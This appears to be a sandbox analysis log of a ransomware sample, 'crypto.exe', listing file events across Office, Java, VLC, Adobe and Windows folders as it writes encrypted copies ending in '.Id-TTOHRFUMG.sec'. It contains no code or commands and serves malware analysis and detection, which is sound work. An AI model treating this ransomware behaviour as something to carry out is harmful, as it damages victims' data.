File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libscreen_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BlackTieResume.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\tab_on.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\WriteMerge.mp4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\en-US\sbdrop.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00217_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\RSWOP.ICM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libaraw_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Merida.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME51.CSS.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099170.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\Logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NPSPWRAP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00236_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\TWLAY32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\STSCOPY.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14795_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR00.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\SwitchTest.dwfx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\sidebar.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\default.vlt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00489_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GreenTea.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePage.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceYi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099151.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00145_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0252349.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_hr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR51F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\7.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\zipfs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCVDT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-bullet.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\VelvetRose.css.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285792.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14800_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBAD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\liboldmovie_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\JavaAccessBridge-64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0102594.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignright.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Earthy.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Students.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_te.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH02155_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Tags.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR23F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME27.CSS.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsVersion1Warning.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_is.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00728_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02413_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\th.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\tr.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\NOTICE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\GWE.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMAIN.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR40F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\en-US\sbdrop.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105378.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\BLANK.ONE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libnfs_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_mmx_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_dts_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\RSSFeeds.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libmpg123_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OneNoteSyncPC.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\co.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01060_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086426.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152626.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\WMPMediaSharing.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OIS_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\w2k_lsa_auth.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\splashscreen.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0250997.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Eurosti.TTF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304853.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EntityPickerIntl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GRAPH.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\Common.fxh.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\picturePuzzle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215718.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382939.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\PersonalContact.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107154.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Elemental.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\VIBE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\SUCTION.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libflaschen_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\vlc.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CERT98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE04050_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00623_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Mail\wabmig.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00021_.GIF.Id-TTOHRFUMG.sec	crypto.exe
